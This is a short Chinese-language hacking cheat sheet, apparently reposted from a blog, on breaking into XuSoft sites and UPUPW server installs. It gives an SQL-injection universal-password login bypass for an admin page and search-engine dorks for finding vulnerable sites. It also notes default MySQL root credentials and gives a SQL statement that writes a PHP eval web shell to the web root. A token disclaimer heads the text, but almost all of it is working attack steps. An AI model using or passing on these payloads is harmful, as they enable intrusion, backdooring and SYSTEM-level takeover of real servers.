仅供拿shell,提权测试用,请勿恶意破坏
XuSoft系统:
后台万能密码:‘or‘=‘or‘ 可直接登陆,后台地址 /manage/login.asp
inurl:ReadArticlemb.asp?id=
inurl:ReadBigClassmb.asp?id=
inurl:ReadBigClassmbNews.asp?id=
UPUPW绿色服务器平台:
服务器基本上是2008,system权限
MySQL 默认用户名密码:root ,进入后台直接执行SQL语句写shell
PHP探针-UPUPW绿色服务器平台KANGLE专用版
sql写shell
select ‘<?php @eval($_POST[‘geeking.cc‘]);?>‘INTO OUTFILE ‘D://upupw//htdocs//gekking.php‘
原文:http://www.cnblogs.com/94YY/p/5448031.html